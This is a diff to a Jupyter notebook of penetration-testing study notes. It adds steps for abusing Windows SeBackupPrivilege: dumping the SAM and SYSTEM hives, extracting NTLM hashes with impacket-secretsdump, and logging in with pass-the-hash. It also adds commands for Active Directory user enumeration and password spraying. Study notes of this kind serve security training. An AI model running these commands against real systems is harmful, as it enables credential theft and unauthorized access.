--- a/hnetwork_notes.ipynb
+++ b/hnetwork_notes.ipynb
@@ -436,7 +436,8 @@
    "source": [
     "* **[SeImpersonate and SeAssignPrimaryToken](#windowsprivescseimpersonetseassignptoken)**\n",
     "* **[SeDebugPrivilege](#windowsprivescsedebugpriv)**\n",
-    "* **[SeTakeOwnershipPrivilege](#windowsprivescsetakeownpriv)**"
+    "* **[SeTakeOwnershipPrivilege](#windowsprivescsetakeownpriv)**\n",
+    "* **[SeBackupPrivilege](#windowsprivescsebackuppriv)**"
    ]
   },
   {
@@ -10122,6 +10123,41 @@
    "cell_type": "markdown",
    "metadata": {},
    "source": [
+    "<a id=\"windowsprivescsebackuppriv\"></a>\n",
+    "\n",
+    "#### **`SeBackupPrivilege`**"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "This privilege allows users to bypass file, directory, registry and other persistent object permissions for the purposes of backing up the system. While this privilege can enable an attacker to read sensitive data throughout the system, it also allows them to leak the SAM and SYSTEM registry hives to the attack host, which can ultimately be fed to impacket-secretsdump to output user hashes:\n",
+    "\n",
+    "**1. Save SAM and SYSTEM Hives:** This must be done in a writeable directory\n",
+    "```powershell\n",
+    "reg save hklm\\sam C:\\Path\\To\\Writeable\\Directory\\SAM\n",
+    "\n",
+    "reg save hklm\\system C:\\Path\\To\\Writeable\\DirectorySYSTEM\n",
+    "```\n",
+    "**2. Transfer Files to Attack Host**\n",
+    "\n",
+    "**3. Retrieve NTLM hashes**\n",
+    "```bash\n",
+    "impacket-secretsdump -sam SAM -system SYSTEM local\n",
+    "```\n",
+    "**4. Escalate Privileges:** Use evil-winrm or impacket-psexec - wmiexec, etc.\n",
+    "```bash\n",
+    "evil-winrm -i x.x.x.x -u Administrator -H LM:NT hashes\n",
+    "\n",
+    "impacket-psexec domain/username@x.x.x.x -hashes LM:NT hashes\n",
+    "```"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
     "<a id=\"windowsprivescgroupprivs\"></a>\n",
     "\n",
     "### **`Group Privileges`**"
@@ -13137,9 +13173,17 @@
     "From the output, users will be validated in the domain. These results can be put in a file to use in targeted password spraying attacks. \n",
     "\n",
     "To make this process easier, the `auxiliary/scanner/smb/smb_lookupsid` and `auxiliary/gather/kerberos_enumusers` modules can be used in msfconsole. \n",
-    " \n",
-    "<br>\n",
     "\n",
+    "Other methods include:\n",
+    "```bash\n",
+    "enum4linux -U x.x.x.x  | grep \"user:\" | cut -f2 -d\"[\" | cut -f1 -d\"]\"      #requires SMB NULL session\n",
+    "rpcclient -U \"\" -N x.x.x.x       #then enumdomusers; this requires SMB NULL Session\n",
+    "\n",
+    "crackmapexec smb x.x.x.x --users\n",
+    "\n",
+    "impacket-lookupsid 'domain.controller/username'@x.x.x.x -no-pass\n",
+    "\n",
+    "```\n",
     "**<u>Identifying Potential Vulnerabilities</u>**\n",
     "\n",
     "The local system account `NT AUTHORITY\\SYSTEM` is a built-in account in Windows OSs. It has the highest level of access in the OS and is used to run most Windows services. It is also common for third-party services to run in the context of this account by default. A SYSTEM account on a domain-joined host will be able to enumerate AD by impersonating the computer account, which is essentially just another kind of user account. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. \n",
@@ -13430,7 +13474,7 @@
     "\n",
     "By using the following syntax, `enum4linux` can disclose valid user accounts if SMB NULL sessions are possible:\n",
     "```bash\n",
-    " enum4linux -U x.x.x.x  | grep \"user:\" | cut -f2 -d\"[\" | cut -f1 -d\"]\"\n",
+    "enum4linux -U x.x.x.x  | grep \"user:\" | cut -f2 -d\"[\" | cut -f1 -d\"]\"\n",
     "\n",
     "```\n",
     "If **`rpcclient` allows anonymous connections**, the enumdomusers command can be used to make a target user list:\n",
@@ -13448,14 +13492,9 @@
     "\n",
     "**<u>Gathering Users with LDAP Anonymous</u>**\n",
     "\n",
-    "Many tools can be used to gather users when an LDAP anonymous bind is found, including windapsearch and ldapsearch.\n",
+    "Many tools can be used to gather users when an LDAP anonymous bind is found, including windapsearch.\n",
     "\n",
     "\n",
-    "If `ldapsearch` is used, it is necessary to specify a valid LDAP search filter\"\n",
-    "```bash\n",
-    "ldapsearch -h x.x.x.x -x -b \"DC=DOMAIN_CONTROLLER,DC=LOCAL\" -s sub \"(&(objectclass=user))\"  | grep sAMAccountName: | cut -f2 -d\" \"\n",
-    "\n",
-    "```\n",
     "To enumerate valid users, `windapseach` will be easier, although knowing how to create LDAP search filters is still very important. With the following syntax, anonymous access is specified by providing a blank username with the -u flag; the -U flag tells the tool to only retrieve users:\n",
     "```bash\n",
     "./windapsearch.py --dc-ip x.x.x.x -u \"\" -U\n",
@@ -13473,12 +13512,21 @@
     "kerbrute userenum -d domain.controller --dc x.x.x.x /usr/share/wordlists\n",
     "\n",
     "```\n",
+    "Also try **Impacket-lookupsid:**\n",
+    "```bash\n",
+    "impacket-lookupsid 'domain.controller/username'@x.x.x.x -no-pass\n",
+    "```\n",
     "\n",
-    "**<u>Credentialed Enumeration to Build our User List</u>**\n",
+    "**<u>Credentialed Enumeration to Build User List</u>**\n",
     "\n",
     "With valid credentials, any of the aforementioned tools can be used to build a user list. The easiest way is with `CrackMapExec`:\n",
     "```bash \n",
     "crackmapexec smb x.x.x.x -u username -p password --users\n",
+    "\n",
+    "```\n",
+    "With a found password, use netexec:\n",
+    "```bash\n",
+    "nxc smb x.x.x.x -u usernames.txt -p 'password' --continue-on-success\n",
     "```"
    ]
   },
